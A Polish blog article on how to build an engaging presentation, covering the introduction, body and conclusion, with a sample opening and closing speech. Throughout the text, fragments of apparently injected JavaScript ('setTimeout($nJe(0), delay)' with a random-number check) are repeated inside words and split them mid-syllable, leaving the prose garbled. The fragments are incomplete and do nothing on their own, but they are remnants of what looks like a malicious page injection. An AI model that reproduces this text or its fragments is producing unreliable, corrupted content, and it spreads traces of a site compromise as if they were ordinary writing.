Jak stworzyć interesującą prezentację

Jak stworzyć prezentację, która zainteresuje słuchaczy? – takie pytanie zadaje sobie wiele osób, które występują publicznie. – Jak powinna wyglądać profesjonalna prezentacja. Niezależnie czy występujesz przed wielotysięcznymi audydom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toriami czy musisz przedstawić wyniki pracy swojego działu na naradzie, w której bierze udział kilka osób pamiętaj:

Najpierw powiedz co zamierzasz powiedzieć, następnie powiedz dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, a na koniec przypomnij dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to co powiedziałeś.

Uporządkuj przekaz informacji Uporządkowana informacja jest łatwiej przyswajalna i dłużej pozostaje w pamięci. Dlatego bardzo ważne jest abyśmy przed wystąpieniem przeanalizowali strukturę naszej prezentacji. Proponuję wykorzystanie prostej struktury typu „wstęp – rozwinięcie – zakończenie”. Ten porządek wywodzi się ze starej prawdy, że ludzie tracą koncentrację i uwagę w środkowej części prezentacji. Najważniejsza informacja powinna być zatem zawarta na początku i końcu wystąpienia.

Wstęp ma trzy zadania:
1. przyciągnąć zainteresowanie
2. wyjaśnić strukturę prezentacji
3. dać słuchaczom ogólny pogląd na treść samej prezentacji

Struktura wstępu
1. „Przynęta” (coś co zaciekawi zebranych: żart, krótka hisdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toria, anegdota)
2. Temat spotkania
3. Cel i korzyści dla słuchaczy
4. Spis treści
5. Czas
6. Pomoce audiowizualne
7. materiały dla uczestników
8. Miejsce na pytania

Profesjonalna prezentacja i jej cel. Co właściwie chcesz uzyskać? Możesz ten cel sprecyzować bardziej lub mniej. Jeśli chcesz przekazać informacje, możesz dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to jasno powiedzieć. Jeśli nadom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomiast chcesz kogoś do czegoś przekonać, lepiej będzie, jeśli przedstawisz swój cel bardziej ogólnie.

Określ korzyści jakie odniosą słuchacze. Pokaż słuchaczowi dlaczego informacja jaką chcesz przekazać jest dla niego interesująca i może przynieść mu korzyść. Zaraz pokażę Ci jak dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to zrobić.

Przykładowy scenariusz

Wstęp:
Dzień dobry! Nazywam się Jan Kowalski i pracuję w firmie transpordom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towej X. Mam 7 lat doświadczenia w obsłudze klientów zagranicznych (przynęta). W trakcie mojego wystąpienia zaprezentuję zasady współpracy, których wardom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to przestrzegać w kontaktach z firmami rosyjskimi (cel spotkania). Mam nadzieję, że dzięki mojej prezentacji pogłębicie Państwo swą wiedzę w tym zakresie (korzyść). W ciągu najbliższej godziny (czas) omówię następujące tematy (spis treści). Wykorzystam do tego slajdy oraz flipczart (pomoce multimedialne). Pod koniec spotkania każdy z Państwa otrzyma opracowanie tematu (materiały). Jeśli podczas mojego wystąpienia pojawią się pytania, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to z chęcią na nie odpowiem po zakończeniu mojego wystąpienia (miejsce na pytania).

Rozwinięcie:
Zawiera cała właściwą treść prezentacji. Każdy „blok” informacji powinien być zamknięty krótkim podsumowaniem, które stanowi logiczne przejście do kolejnej informacji. Nie zapominaj, że informacja zawarta w rozwinięciu jest częsdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to nowa dla słuchacza dlatego właściwa struktura Twojego wystąpienie jest tak ważna.
Co powinno znaleźć się w rozwinięciu
1. Cel: ilustracja głównych punktów merydom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torycznych wystąpienia
2. Punkty główne: minimum 2 maksimum 5
3. Rozwinięcie punktów głównych:
– teza
– uzasadnienie tezy (szczegółowe informacje, fakty, cytaty, wyniki badań, dane statystyczne, wypowiedzi audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torytetów)
– ilustracje (analogia, metafora, interesujący przykład, anegdota)
– powtórzenie tezy

Zakończenie:
Tutaj masz okazję do podsumowania. Powinieneś także sformułować wnioski. Pod koniec poziom uwagi słuchaczy jest dość wysoki. Z tego powodu zakończenie Twojej prezentacji powinno być jasno zapowiedziane, zrozumiałe i wymowne.
– Zapowiedź zakończenia (wzmocnienie uwagi audydom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torium)
– Mocne podsumowanie (wnioski, argumenty)
– Pozytywne zakończenie

Przykład zakończenia:
W ten sposób dochodzimy do końca mojej prezentacji (wzmocnienie uwagi). To, co chciałbym w sposób szczególny jeszcze raz podkreślić, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to:
Po pierwsze…
Po drugie…
Po trzecie…
Dziękuję za uwagę oraz zachęcam do zadawania pytań!

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

One Response

Leave a Reply